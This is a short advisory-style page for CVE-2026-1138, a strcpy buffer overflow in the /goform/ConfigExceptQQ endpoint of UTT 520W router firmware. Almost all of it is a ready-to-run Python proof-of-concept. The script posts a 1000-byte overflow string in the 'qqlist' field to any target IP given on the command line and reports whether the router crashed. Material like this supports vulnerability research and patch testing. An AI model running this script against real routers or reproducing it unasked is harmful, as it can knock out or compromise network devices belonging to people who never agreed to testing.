CVE-2026-1138 UTT路由器ConfigExceptQQ页面strcpy缓冲区溢出漏洞

import requests import sys # CVE-2026-1138 PoC - Buffer Overflow in UTT Router /goform/ConfigExceptQQ # Target: UTT 进取 520W firmware 1.7.7-180627 def exploit_buffer_overflow(target_ip, target_port=80): """ Exploit for CVE-2026-1138 buffer overflow in strcpy function Target: /goform/ConfigExceptQQ endpoint """ url = f"http://{target_ip}:{target_port}/goform/ConfigExceptQQ" # Generate payload with excessive length to trigger overflow # The exact overflow length depends on the buffer size in the firmware # This payload uses pattern to identify overflow point payload_size = 1000 # Adjust based on target overflow_payload = "A" * payload_size headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } # Data fields that trigger strcpy in ConfigExceptQQ data = { 'qqlist': overflow_payload, # Primary overflow vector 'except': '1' } try: print(f"[*] Sending exploit payload to {url}") print(f"[*] Payload size: {len(overflow_payload)} bytes") response = requests.post(url, data=data, headers=headers, timeout=10) print(f"[+] Response status: {response.status_code}") print(f"[+] Response length: {len(response.content)} bytes") # Check for signs of successful exploitation if response.status_code == 200 or response.status_code == 500: print("[!] Potential buffer overflow triggered") print("[!] Router may have crashed or been compromised") return response except requests.exceptions.Timeout: print("[-] Request timeout - target may have crashed") except requests.exceptions.ConnectionError: print("[-] Connection error - target may be down") except Exception as e: print(f"[-] Error: {str(e)}") return None if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 exploit_buffer_overflow(target, port)